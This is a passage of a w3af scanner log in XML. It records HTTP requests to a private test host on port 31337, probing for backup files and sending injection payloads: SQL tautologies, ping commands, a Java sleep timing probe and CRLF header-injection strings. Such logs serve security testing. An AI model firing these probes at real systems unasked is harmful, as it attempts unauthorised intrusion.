h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="441">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="442">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="443">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="444">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="446">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="447">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="448">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="449">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="451">
                <http-request>
                    <status>GET http://10.12.68.43:31337/15%22+OR+%2215%22%3D%2215 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 15%22+OR+%2215%22%3D%2215 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='15%22+OR+%2215%22%3D%2215'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="457">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="464">
                <http-request>
                    <status>GET http://10.12.68.43:31337/15%22+AND+%2215%22%3D%2216 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 15%22+AND+%2215%22%3D%2216 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='15%22+AND+%2215%22%3D%2216'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="467">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="471">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="472">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="473">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.backup1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="476">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="481">
                <http-request>
                    <status>GET http://10.12.68.43:31337/45%27+OR+%2745%27%3D%2745 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 45%27+OR+%2745%27%3D%2745 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='45%27+OR+%2745%27%3D%2745'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="485">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="492">
                <http-request>
                    <status>GET http://10.12.68.43:31337/45%27+AND+%2745%27%3D%2746 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 45%27+AND+%2745%27%3D%2746 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='45%27+AND+%2745%27%3D%2746'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="508">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="519">
                <http-request>
                    <status>GET http://10.12.68.43:31337/19%27+OR+%2719%27%3D%2719 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 19%27+OR+%2719%27%3D%2719 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='19%27+OR+%2719%27%3D%2719'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="525">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0D%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0D%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="528">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
